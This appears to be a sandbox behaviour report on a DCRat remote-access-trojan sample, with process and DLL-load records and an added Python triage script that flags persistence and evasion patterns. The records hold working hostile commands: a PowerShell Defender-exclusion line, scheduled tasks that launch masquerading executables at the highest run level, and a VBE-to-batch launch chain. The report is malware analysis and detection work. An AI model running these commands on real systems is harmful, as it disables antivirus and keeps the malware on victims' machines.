              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /rl HIGHEST /f
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /rl HIGHEST /f
              Source: unknownProcess created: C:\Users\user\cmd.exe C:\Users\user\cmd.exe
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 8 /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /f
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtL" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
              Source: unknownProcess created: C:\Users\user\cmd.exe C:\Users\user\cmd.exe
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 8 /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /f
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f
              Source: unknownProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f
              Source: unknownProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
              Source: unknownProcess created: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe "C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe "C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe"
              Source: C:\Componenthost\providerreviewdhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8o9UezPTg6.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess created: C:\Users\user\AppData\Local\Temp\javaclient.exe "C:\Users\user\AppData\Local\Temp\javaclient.exe" Jump to behavior
Source: C:\Users\user\Desktop\cougif6lqM.exe | Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Componenthost\N1me8mpFe7zJQMouCBhkn06ZkahUl.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Componenthost\providerreviewdhcp.exe "C:\Componenthost\providerreviewdhcp.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Componenthost\providerreviewdhcp.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8o9UezPTg6.bat"
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
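The process-creation records above carry the whole persistence and defence-evasion chain in a handful of lines: javaclient.exe spawns PowerShell with -ExecutionPolicy Bypass to add a Defender path exclusion for itself, registers a scheduled task that runs every 11 minutes at the HIGHEST run level from the non-standard folder C:\Componenthost, and the DCRatBuild.exe stage drops into wscript.exe running a .vbe from that same folder, which in turn runs a .bat. Further down the listing, javaclient.exe also loads avicap32.dll and msvfw32.dll (the Video for Windows capture libraries), and a .NET binary named cmd.exe runs out of C:\Users\user rather than System32. The Python below is an added triage helper, not part of the Joe Sandbox report: it parses records in the report's own "Source / event" form (including the fused "...exeProcess created:" form and the trailing "Jump to behavior" link label) and flags those patterns. The rule names, the path heuristics and the sample records are this example's own; the records are constructed by copying lines from the listing above.

```python
import re
from dataclasses import dataclass

# Constructed sample: records copied from the behaviour listing above, written as
# "Source: <process> | <event>: <value>" (one record is left in the report's fused form).
SAMPLE_RECORDS = [
    r'Source: C:\Users\user\Desktop\cougif6lqM.exe | Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"',
    r"""Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'""",
    r"""Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f""",
    r'Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe"',
    r'Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Componenthost\N1me8mpFe7zJQMouCBhkn06ZkahUl.bat" "',
    r"Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: avicap32.dllJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: amsi.dll",
    r"Source: C:\Users\user\cmd.exe | Section loaded: mscoree.dll",
    r"Source: C:\Users\user\cmd.exe | Section loaded: cryptsp.dll",
]

# "Source: <proc>" optionally separated by " | " from "<event>: <value>", with the
# report's "Jump to behavior" link label tolerated at the end of the line.
RECORD_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*\|?\s*(?P<event>Process created|Section loaded):"
    r"\s*(?P<value>.*?)\s*(?:Jump to behavior)?$"
)
IMAGE_RE = re.compile(r"^(.+?\.exe)", re.I)            # image path = text up to the first .exe
SCRIPT_RE = re.compile(r'"([^"]+\.(?:vbe|vbs|js|jse|wsf|bat|cmd))"', re.I)

# Heuristics (this example's choices): trusted install roots, binary names that belong
# in those roots, script hosts, and the Video for Windows capture DLLs.
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SYSTEM_PROCESS_NAMES = {"cmd.exe", "svchost.exe", "explorer.exe", "lsass.exe", "csrss.exe", "conhost.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}
CAPTURE_DLLS = {"avicap32.dll", "msvfw32.dll"}


@dataclass(frozen=True)
class Finding:
    rule: str
    source: str
    detail: str


def parse_record(line):
    """Return (source, event, value) for one report line, or None if it is not a record."""
    m = RECORD_RE.match(line.strip())
    return (m["source"], m["event"], m["value"]) if m else None


def in_system_dir(path):
    return path.lower().strip("'\" ").startswith(SYSTEM_DIRS)


def basename(path):
    return path.strip("'\" ").rsplit("\\", 1)[-1].lower()


def check_image_location(path, source):
    """A system-process name living outside the system directories (e.g. C:\\Users\\user\\cmd.exe)."""
    if path and basename(path) in SYSTEM_PROCESS_NAMES and not in_system_dir(path):
        return [Finding("system_name_outside_system_dir", source, path)]
    return []


def check_process_creation(source, cmdline):
    findings = []
    m = IMAGE_RE.match(cmdline)
    image = m.group(1) if m else ""
    name, low = basename(image), cmdline.lower()
    findings += check_image_location(image, source)
    # PowerShell with the execution policy bypassed, adding a Defender exclusion.
    if name == "powershell.exe" and "-executionpolicy bypass" in low and "add-mppreference" in low:
        ex = re.search(r"-exclusionpath\s+'?([^']+)'?", cmdline, re.I)
        findings.append(Finding("defender_exclusion", source, ex.group(1).strip() if ex else cmdline))
    # High-frequency or highest-run-level task whose action lives outside the system roots.
    if name == "schtasks.exe" and "/create" in low:
        tn = re.search(r'/tn\s+"?([^"\s]+)"?', cmdline, re.I)
        tr = re.search(r"""/tr\s+"?'?([^"']+)'?"?""", cmdline, re.I)
        target = tr.group(1).strip() if tr else ""
        if ("/sc minute" in low or "/rl highest" in low) and not in_system_dir(target):
            findings.append(Finding("schtasks_persistence", source, f"{tn.group(1) if tn else '?'} -> {target}"))
    # Script host executing a script from a folder that is not a system root.
    if name in SCRIPT_HOSTS:
        for script in SCRIPT_RE.findall(cmdline):
            if not in_system_dir(script):
                findings.append(Finding("script_from_suspicious_folder", source, script))
    return findings


def check_section_load(source, dll):
    if dll.lower() in CAPTURE_DLLS:
        return [Finding("video_capture_capability", source, dll)]
    return []


def triage(records):
    """Run every rule over the records; duplicates (same rule, source, detail) are collapsed."""
    findings = []
    for line in records:
        parsed = parse_record(line)
        if parsed is None:
            continue
        source, event, value = parsed
        findings += check_image_location(source, source)
        findings += check_process_creation(source, value) if event == "Process created" else check_section_load(source, value)
    return list(dict.fromkeys(findings))


if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"[{f.rule}] {f.source} -> {f.detail}")
```

Run against the nine constructed records this yields six findings: the Defender exclusion for javaclient.exe, the minute-interval HIGHEST task pointing at C:\Componenthost, the .vbe and .bat launched from that folder, the capture-DLL load by javaclient.exe, and the cmd.exe living under C:\Users\user. Pasting the full behaviour listing in place of SAMPLE_RECORDS works the same way, since the parser accepts the report's fused records as they are.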
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\cougif6lqM.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\javaclient.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: mscoree.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: apphelp.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: kernel.appcore.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: version.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: uxtheme.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: windows.storage.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: wldp.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: profapi.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: cryptsp.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: rsaenh.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: cryptbase.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: sspicli.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: amsi.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: userenv.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: ntmarta.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: wbemcomn.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: propsys.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: dlnashext.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: wpdshext.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: edputil.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: urlmon.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: iertutil.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: srvcli.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: netutils.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: wintypes.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: appresolver.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: bcp47langs.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: slc.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: sppc.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Componenthost\providerreviewdhcp.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
